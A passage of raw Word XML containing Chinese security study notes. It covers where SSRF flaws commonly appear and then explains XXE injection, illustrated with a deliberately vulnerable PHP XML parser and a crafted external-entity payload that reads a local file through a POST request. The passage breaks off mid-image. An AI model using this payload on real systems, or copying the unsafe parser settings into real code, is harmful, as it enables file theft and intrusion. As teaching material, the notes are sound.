    <w:p w:rsidR="00EE0B76" w:rsidRDefault="003B3A99" w:rsidP="00EE0B76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当然如果URL是这样的</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00D11F9B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www.A.com/A.php?</w:t>
        </w:r>
        <w:r w:rsidR="00D11F9B" w:rsidRPr="00CE2254">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>image</w:t>
        </w:r>
        <w:r w:rsidR="00D11F9B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=</w:t>
        </w:r>
        <w:r w:rsidR="00D11F9B" w:rsidRPr="00CE2254">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.B.com/Image/B.png</w:t>
        </w:r>
        <w:r w:rsidR="00D11F9B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明显B.png</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D11F9B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是在</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00D11F9B" w:rsidRPr="00CE2254">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.B.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D11F9B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这个网站下的，这个网站可能和A网站没有在同一个内网里面，但是B这个网站给了A网站访问Image/这个目录的权限，所以按照上面操作即可</w:t>
      </w:r>
      <w:r w:rsidR="00135C20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探测</w:t>
      </w:r>
      <w:r w:rsidR="00135C20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lastRenderedPageBreak/>
        <w:t>B网站的相应内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F01" w:rsidRPr="00EE0B76" w:rsidRDefault="00502F01" w:rsidP="00EE0B76">
      <w:pPr>
        <w:pStyle w:val="Heading3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bookmarkStart w:id="35" w:name="_Toc489789718"/>
      <w:r w:rsidRPr="00502F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00502F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的寻找（漏洞常见出没位置）：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00502F01" w:rsidRPr="00502F01" w:rsidRDefault="00502F01" w:rsidP="006412EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00502F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1）分享：通过URL地址分享网页内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F01" w:rsidRPr="00502F01" w:rsidRDefault="00502F01" w:rsidP="006412EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00502F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2）转码服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F01" w:rsidRPr="00502F01" w:rsidRDefault="00502F01" w:rsidP="006412EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00502F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3）在线翻译</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F01" w:rsidRPr="00502F01" w:rsidRDefault="00502F01" w:rsidP="006412EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00502F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4）图片加载与下载：通过URL地址加载或下载图片</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F01" w:rsidRPr="00502F01" w:rsidRDefault="00502F01" w:rsidP="006412EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00502F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5）图片、文章收藏功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F01" w:rsidRPr="00502F01" w:rsidRDefault="00502F01" w:rsidP="006412EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00502F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6）未公开的api实现以及其他调用URL的功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502F01" w:rsidRDefault="00502F01" w:rsidP="006412EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00502F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7）从URL关键字中寻找</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB53D2" w:rsidRDefault="00DB53D2" w:rsidP="00DB53D2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_XXE漏洞"/>
      <w:bookmarkStart w:id="37" w:name="_Toc489789719"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="00670C92" w:rsidRPr="00670C92" w:rsidRDefault="0073089F" w:rsidP="008F2A26">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00670C92" w:rsidRPr="008F2A26">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.cnblogs.com/ONDragon/p/6897967.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003B3A99" w:rsidRPr="00635DA3" w:rsidRDefault="00B9588A" w:rsidP="00A53D17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635DA3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XXE (XML External Entity Injection) 漏洞发生在应用程序解析 XML 输入时，没有禁止外部实体的加载。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4E23" w:rsidRDefault="00120D94" w:rsidP="00120D94">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc489789720"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>危害：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="00622AD1" w:rsidRPr="00635DA3" w:rsidRDefault="00622AD1" w:rsidP="00635DA3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635DA3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窃取敏感数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00635DA3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 xml:space="preserve"> (extracting sensitive data).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622AD1" w:rsidRPr="00635DA3" w:rsidRDefault="00622AD1" w:rsidP="00635DA3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635DA3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远程代码执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00635DA3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 xml:space="preserve"> (remote code execution).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622AD1" w:rsidRPr="00635DA3" w:rsidRDefault="00622AD1" w:rsidP="00635DA3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635DA3"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攻击者可以实现任意文件读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00635DA3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,DOS拒绝服务攻击以及代理扫描内网等.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120D94" w:rsidRDefault="00622AD1" w:rsidP="00622AD1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc489789721"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>举例：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00635DA3" w:rsidRDefault="00E23570" w:rsidP="00635DA3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635DA3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lastRenderedPageBreak/>
        <w:t>服务器上面有一个xxeInject.php存在一个注入的文件，正常访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="007A5477">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:noProof/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="561863BE" wp14:editId="00B7643E">
            <wp:extent cx="2541270" cy="1288415"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="10" name="图片 10" descr="http://images2015.cnblogs.com/blog/1161231/201705/1161231-20170524105253419-1427938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1161231/201705/1161231-20170524105253419-142793838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0" w:rsidRPr="00635DA3" w:rsidRDefault="00E23570" w:rsidP="00635DA3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635DA3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文件内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="00E23570">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5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23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="9F8248"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="168D4770" wp14:editId="44FA4DE8">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="9" name="图片 9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2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0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;?php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8000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#关闭Warning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8080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>error_reporting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E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E_ALL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^</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E_NOTICE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^</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E_WARNING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E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#加载xml文件，不懂php://input 参考下面链接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8000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#http://taoshi.blog.51cto.com/1724747/1165499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800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$xmlfile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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file_get_contents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('php://input')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800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$dom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 xml:space="preserve"> = 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new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 xml:space="preserve"> DOMDocument()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8000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># LIBXML_NOENT: 将 XML 中的实体引用 替换 成对应的值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8000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># LIBXML_DTDLOAD: 加载 DOCTYPE 中的 DTD 文件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800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$dom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-&gt;loadXML(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$xmlfile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, LIBXML_NOENT | LIBXML_DTDLOAD)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800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$creds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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>simplexml_import_dom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E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$dom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800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$user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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$creds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-&gt;user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800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$pass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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$creds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-&gt;pass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00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo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 xml:space="preserve"> "Hello DaLao:" . "&lt;br&gt;" . "</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$user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"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0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="00E23570">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5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23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="9F8248"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="518BA7CB" wp14:editId="75B0E51E">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="8" name="图片 8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2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0" w:rsidRPr="00635DA3" w:rsidRDefault="00E23570" w:rsidP="00635DA3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635DA3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存在一个POST，XXE注入，所以我们构造代码，进行注入，因为是测试，我新建了一个文件如：C://pass.txt，内容：ONDragon'Password,我们就利用这个漏洞进行此文件的读取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00635DA3" w:rsidRDefault="00E23570" w:rsidP="00635DA3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635DA3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构造代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="00E23570">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5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23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="9F8248"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E52AFF4" wp14:editId="6534E773">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="7" name="图片 7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复制代码">
                      <a:hlinkClick r:id="rId2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00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xml version="1.0" encoding="UTF-8"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?&gt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FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;!</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DOCTYPE ONDragon [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FF00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;!ELEMENT ONDragon ANY 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gt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00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;!</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ENTITY xxe SYSTEM "file:///C://pass.txt" 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gt;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]&gt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00FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>creds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gt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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;xxe;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lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user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gt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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pass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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ONDragon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lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pass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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="00E235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E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>creds</w:t>
      </w:r>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="00E23570">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5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23570">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="9F8248"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39A00F61" wp14:editId="4C7AC598">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="6" name="图片 6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2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0" w:rsidRPr="005F51A0" w:rsidRDefault="00E23570" w:rsidP="00E23570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45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5F51A0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我们打开火狐的Live Http这个小插件进行POST数据注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="007B77B7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:noProof/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CFB2B64" wp14:editId="6ABC66A1">
            <wp:extent cx="5308378" cy="3538761"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5080"/>
            <wp:docPr id="5" name="图片 5" descr="http://images2015.cnblogs.com/blog/1161231/201705/1161231-20170524105922622-1961152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2015.cnblogs.com/blog/1161231/201705/1161231-20170524105922622-196115258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40" cy="35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0" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="00E23570">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="0062047F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:noProof/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58BA1D62" wp14:editId="77060BD8">
